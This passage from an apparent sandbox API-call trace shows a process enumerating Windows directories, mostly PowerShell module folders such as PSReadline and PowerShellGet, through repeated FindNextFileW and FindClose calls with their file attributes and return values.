lpFindFileData=0x1b7fe200*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbd27a88b, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbd27a88b, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="1.1", cAlternateFileName="")) returned 0 [0226.847] FindClose (in: hFindFile=0x1a5cf5b0 | out: hFindFile=0x1a5cf5b0) returned 1 [0226.848] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7fe460) returned 1 [0226.849] FindNextFileW (in: hFindFile=0x1a5cf730, lpFindFileData=0x1b7fe070 | out: lpFindFileData=0x1b7fe070*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbd27a88b, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbd27a88b, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0226.849] FindNextFileW (in: hFindFile=0x1a5cf730, lpFindFileData=0x1b7fe070 | out: lpFindFileData=0x1b7fe070*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbd27a88b, ftCreationTime.dwHighDateTime=0x1d112f1, ftLastAccessTime.dwLowDateTime=0xbd27a88b, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbd27a88b, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en", cAlternateFileName="")) returned 1 [0226.849] FindNextFileW (in: hFindFile=0x1a5cf730, lpFindFileData=0x1b7fe070 | out: lpFindFileData=0x1b7fe070*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32b93ba, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x97199283, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x97199283, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x25200, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.PSReadline.dll", cAlternateFileName="MICROS~1.DLL")) returned 1 [0226.850] FindNextFileW (in: hFindFile=0x1a5cf730, lpFindFileData=0x1b7fe070 | out: lpFindFileData=0x1b7fe070*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32b93ba, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x97199283, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x97199283, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x2e1, dwReserved0=0x0, dwReserved1=0x0, cFileName="PSReadline.psd1", cAlternateFileName="PSREAD~1.PSD")) returned 1 [0226.850] FindNextFileW (in: hFindFile=0x1a5cf730, lpFindFileData=0x1b7fe070 | out: lpFindFileData=0x1b7fe070*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32b93ba, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x97199283, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x97199283, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xb4, dwReserved0=0x0, dwReserved1=0x0, cFileName="PSReadline.psm1", cAlternateFileName="PSREAD~1.PSM")) returned 1 [0226.850] FindNextFileW (in: hFindFile=0x1a5cf730, lpFindFileData=0x1b7fe070 | out: lpFindFileData=0x1b7fe070*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32b93ba, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x97199283, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x97199283, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xb4, dwReserved0=0x0, dwReserved1=0x0, cFileName="PSReadline.psm1", cAlternateFileName="PSREAD~1.PSM")) returned 0 [0226.851] FindClose (in: hFindFile=0x1a5cf730 | out: hFindFile=0x1a5cf730) returned 1 [0226.851] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7fe2d0) returned 1 [0226.851] FindNextFileW (in: hFindFile=0x1a5cf5b0, lpFindFileData=0x1b7fe070 | out: lpFindFileData=0x1b7fe070*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbd27a88b, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbd27a88b, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0226.852] FindNextFileW (in: hFindFile=0x1a5cf5b0, lpFindFileData=0x1b7fe070 | out: lpFindFileData=0x1b7fe070*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbd27a88b, ftCreationTime.dwHighDateTime=0x1d112f1, ftLastAccessTime.dwLowDateTime=0xbd27a88b, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbd27a88b, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en", cAlternateFileName="")) returned 1 [0226.852] FindNextFileW (in: hFindFile=0x1a5cf5b0, lpFindFileData=0x1b7fe070 | out: lpFindFileData=0x1b7fe070*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32b93ba, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x97199283, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x97199283, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x25200, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.PSReadline.dll", cAlternateFileName="MICROS~1.DLL")) returned 1 [0226.852] FindNextFileW (in: hFindFile=0x1a5cf5b0, lpFindFileData=0x1b7fe070 | out: lpFindFileData=0x1b7fe070*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32b93ba, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x97199283, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x97199283, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x2e1, dwReserved0=0x0, dwReserved1=0x0, cFileName="PSReadline.psd1", cAlternateFileName="PSREAD~1.PSD")) returned 1 [0226.852] FindNextFileW (in: hFindFile=0x1a5cf5b0, lpFindFileData=0x1b7fe070 | out: lpFindFileData=0x1b7fe070*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32b93ba, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x97199283, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x97199283, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xb4, dwReserved0=0x0, dwReserved1=0x0, cFileName="PSReadline.psm1", cAlternateFileName="PSREAD~1.PSM")) returned 1 [0226.853] FindNextFileW (in: hFindFile=0x1a5cf5b0, lpFindFileData=0x1b7fe070 | out: lpFindFileData=0x1b7fe070*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0226.853] FindClose (in: hFindFile=0x1a5cf5b0 | out: hFindFile=0x1a5cf5b0) returned 1 [0226.853] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7fe2d0) returned 1 [0226.854] FindNextFileW (in: hFindFile=0x1a5cf5b0, lpFindFileData=0x1b7fdee0 | out: lpFindFileData=0x1b7fdee0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbd27a88b, ftCreationTime.dwHighDateTime=0x1d112f1, ftLastAccessTime.dwLowDateTime=0xbd27a88b, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbd27a88b, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0226.854] FindNextFileW (in: hFindFile=0x1a5cf5b0, lpFindFileData=0x1b7fdee0 | out: lpFindFileData=0x1b7fdee0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbd27a88b, ftCreationTime.dwHighDateTime=0x1d112f1, ftLastAccessTime.dwLowDateTime=0xb7499523, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xb7499523, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x4200, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.PSReadline.Resources.dll", cAlternateFileName="MICROS~1.DLL")) returned 1 [0226.854] FindNextFileW (in: hFindFile=0x1a5cf5b0, lpFindFileData=0x1b7fdee0 | out: lpFindFileData=0x1b7fdee0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbd27a88b, ftCreationTime.dwHighDateTime=0x1d112f1, ftLastAccessTime.dwLowDateTime=0xb7499523, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xb7499523, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x4200, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.PSReadline.Resources.dll", cAlternateFileName="MICROS~1.DLL")) returned 0 [0226.854] FindClose (in: hFindFile=0x1a5cf5b0 | out: hFindFile=0x1a5cf5b0) returned 1 [0226.855] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7fe140) returned 1 [0226.855] FindNextFileW (in: hFindFile=0x1a5cf5b0, lpFindFileData=0x1b7fdee0 | out: lpFindFileData=0x1b7fdee0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbd27a88b, ftCreationTime.dwHighDateTime=0x1d112f1, ftLastAccessTime.dwLowDateTime=0xbd27a88b, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbd27a88b, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0226.855] FindNextFileW (in: hFindFile=0x1a5cf5b0, lpFindFileData=0x1b7fdee0 | out: lpFindFileData=0x1b7fdee0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbd27a88b, ftCreationTime.dwHighDateTime=0x1d112f1, ftLastAccessTime.dwLowDateTime=0xb7499523, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xb7499523, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x4200, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.PSReadline.Resources.dll", cAlternateFileName="MICROS~1.DLL")) returned 1 [0226.856] FindNextFileW (in: hFindFile=0x1a5cf5b0, lpFindFileData=0x1b7fdee0 | out: lpFindFileData=0x1b7fdee0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0226.856] FindClose (in: hFindFile=0x1a5cf5b0 | out: hFindFile=0x1a5cf5b0) returned 1 [0226.856] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7fe140) returned 1 [0226.856] FindNextFileW (in: hFindFile=0x1a5cf5b0, lpFindFileData=0x1b7fdf40 | out: lpFindFileData=0x1b7fdf40*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbd27a88b, ftCreationTime.dwHighDateTime=0x1d112f1, ftLastAccessTime.dwLowDateTime=0xbd27a88b, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbd27a88b, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0226.857] FindNextFileW (in: hFindFile=0x1a5cf5b0, lpFindFileData=0x1b7fdf40 | out: lpFindFileData=0x1b7fdf40*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbd27a88b, ftCreationTime.dwHighDateTime=0x1d112f1, ftLastAccessTime.dwLowDateTime=0xb7499523, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xb7499523, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x4200, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.PSReadline.Resources.dll", cAlternateFileName="MICROS~1.DLL")) returned 1 [0226.857] FindNextFileW (in: hFindFile=0x1a5cf5b0, lpFindFileData=0x1b7fdf40 | out: lpFindFileData=0x1b7fdf40*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbd27a88b, ftCreationTime.dwHighDateTime=0x1d112f1, ftLastAccessTime.dwLowDateTime=0xb7499523, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xb7499523, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x4200, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.PSReadline.Resources.dll", cAlternateFileName="MICROS~1.DLL")) returned 0 [0226.857] FindClose (in: hFindFile=0x1a5cf5b0 | out: hFindFile=0x1a5cf5b0) returned 1 [0226.857] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7fe1a0) returned 1 [0226.858] FindNextFileW (in: hFindFile=0x1a5cf5b0, lpFindFileData=0x1b7fe0d0 | out: lpFindFileData=0x1b7fe0d0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbd27a88b, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbd27a88b, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0226.858] FindNextFileW (in: hFindFile=0x1a5cf5b0, lpFindFileData=0x1b7fe0d0 | out: lpFindFileData=0x1b7fe0d0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbd27a88b, ftCreationTime.dwHighDateTime=0x1d112f1, ftLastAccessTime.dwLowDateTime=0xbd27a88b, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbd27a88b, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en", cAlternateFileName="")) returned 1 [0226.859] FindNextFileW (in: hFindFile=0x1a5cf5b0, lpFindFileData=0x1b7fe0d0 | out: lpFindFileData=0x1b7fe0d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32b93ba, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x97199283, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x97199283, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x25200, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.PSReadline.dll", cAlternateFileName="MICROS~1.DLL")) returned 1 [0226.859] FindNextFileW (in: hFindFile=0x1a5cf5b0, lpFindFileData=0x1b7fe0d0 | out: lpFindFileData=0x1b7fe0d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32b93ba, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x97199283, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x97199283, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x2e1, dwReserved0=0x0, dwReserved1=0x0, cFileName="PSReadline.psd1", cAlternateFileName="PSREAD~1.PSD")) returned 1 [0226.859] FindNextFileW (in: hFindFile=0x1a5cf5b0, lpFindFileData=0x1b7fe0d0 | out: lpFindFileData=0x1b7fe0d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32b93ba, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x97199283, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x97199283, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xb4, dwReserved0=0x0, dwReserved1=0x0, cFileName="PSReadline.psm1", cAlternateFileName="PSREAD~1.PSM")) returned 1 [0226.859] FindNextFileW (in: hFindFile=0x1a5cf5b0, lpFindFileData=0x1b7fe0d0 | out: lpFindFileData=0x1b7fe0d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32b93ba, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x97199283, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x97199283, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xb4, dwReserved0=0x0, dwReserved1=0x0, cFileName="PSReadline.psm1", cAlternateFileName="PSREAD~1.PSM")) returned 0 [0226.860] FindClose (in: hFindFile=0x1a5cf5b0 | out: hFindFile=0x1a5cf5b0) returned 1 [0226.860] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7fe330) returned 1 [0226.860] FindNextFileW (in: hFindFile=0x1a5cf5b0, lpFindFileData=0x1b7fe260 | out: lpFindFileData=0x1b7fe260*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0226.861] FindNextFileW (in: hFindFile=0x1a5cf5b0, lpFindFileData=0x1b7fe260 | out: lpFindFileData=0x1b7fe260*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbd27a88b, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbd27a88b, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="1.1", cAlternateFileName="")) returned 1 [0226.861] FindNextFileW (in: hFindFile=0x1a5cf5b0, lpFindFileData=0x1b7fe260 | out: lpFindFileData=0x1b7fe260*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0226.861] FindClose (in: hFindFile=0x1a5cf5b0 | out: hFindFile=0x1a5cf5b0) returned 1 [0226.861] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7fe4c0) returned 1 [0226.863] FindNextFileW (in: hFindFile=0x1a5cf5b0, lpFindFileData=0x1b7fe3f0 | out: lpFindFileData=0x1b7fe3f0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc47584, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0226.863] FindNextFileW (in: hFindFile=0x1a5cf5b0, lpFindFileData=0x1b7fe3f0 | out: lpFindFileData=0x1b7fe3f0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc47584, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PackageManagement", cAlternateFileName="PACKAG~1")) returned 1 [0226.863] FindNextFileW (in: hFindFile=0x1a5cf5b0, lpFindFileData=0x1b7fe3f0 | out: lpFindFileData=0x1b7fe3f0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Pester", cAlternateFileName="")) returned 1 [0226.863] FindNextFileW (in: hFindFile=0x1a5cf5b0, lpFindFileData=0x1b7fe3f0 | out: lpFindFileData=0x1b7fe3f0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PowerShellGet", cAlternateFileName="POWERS~1")) returned 1 [0226.864] FindNextFileW (in: hFindFile=0x1a5cf5b0, lpFindFileData=0x1b7fe3f0 | out: lpFindFileData=0x1b7fe3f0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PSReadline", cAlternateFileName="PSREAD~1")) returned 1 [0226.864] FindNextFileW (in: hFindFile=0x1a5cf5b0, lpFindFileData=0x1b7fe3f0 | out: lpFindFileData=0x1b7fe3f0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0226.864] FindClose (in: hFindFile=0x1a5cf5b0 | out: hFindFile=0x1a5cf5b0) returned 1 [0226.864] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7fe650) returned 1 [0226.865] FindNextFileW (in: hFindFile=0x1a5cf5b0, lpFindFileData=0x1b7fe390 | out: lpFindFileData=0x1b7fe390*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x6f8bffde, ftLastAccessTime.dwHighDateTime=0x1d112f2, ftLastWriteTime.dwLowDateTime=0x6f8bffde, ftLastWriteTime.dwHighDateTime=0x1d112f2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0226.865] FindNextFileW (in: hFindFile=0x1a5cf5b0, lpFindFileData=0x1b7fe390 | out: lpFindFileData=0x1b7fe390*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa208ee8, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa208ee8, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="AppBackgroundTask", cAlternateFileName="APPBAC~1")) returned 1 [0226.865] FindNextFileW (in: hFindFile=0x1a5cf5b0, lpFindFileData=0x1b7fe390 | out: lpFindFileData=0x1b7fe390*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x6f8bffde, ftCreationTime.dwHighDateTime=0x1d112f2, ftLastAccessTime.dwLowDateTime=0x6f8bffde, ftLastAccessTime.dwHighDateTime=0x1d112f2, ftLastWriteTime.dwLowDateTime=0x6f8bffde, ftLastWriteTime.dwHighDateTime=0x1d112f2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="AppLocker", cAlternateFileName="APPLOC~1")) returned 1 [0226.866] FindNextFileW (in: hFindFile=0x1a5cf5b0, lpFindFileData=0x1b7fe390 | out: lpFindFileData=0x1b7fe390*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Appx", cAlternateFileName="")) returned 1 [0226.866] FindNextFileW (in: hFindFile=0x1a5cf5b0, lpFindFileData=0x1b7fe390 | out: lpFindFileData=0x1b7fe390*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6f8bffde, ftCreationTime.dwHighDateTime=0x1d112f2, ftLastAccessTime.dwLowDateTime=0x6f8bffde, ftLastAccessTime.dwHighDateTime=0x1d112f2, ftLastWriteTime.dwLowDateTime=0x6f8bffde, ftLastWriteTime.dwHighDateTime=0x1d112f2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="AssignedAccess", cAlternateFileName="ASSIGN~1")) returned 1 [0226.866] FindNextFileW (in: hFindFile=0x1a5cf5b0, lpFindFileData=0x1b7fe390 | out: lpFindFileData=0x1b7fe390*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="BitLocker", cAlternateFileName="BITLOC~1")) returned 1 [0226.867] FindNextFileW (in: hFindFile=0x1a5cf5b0, lpFindFileData=0x1b7fe390 | out: lpFindFileData=0x1b7fe390*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, 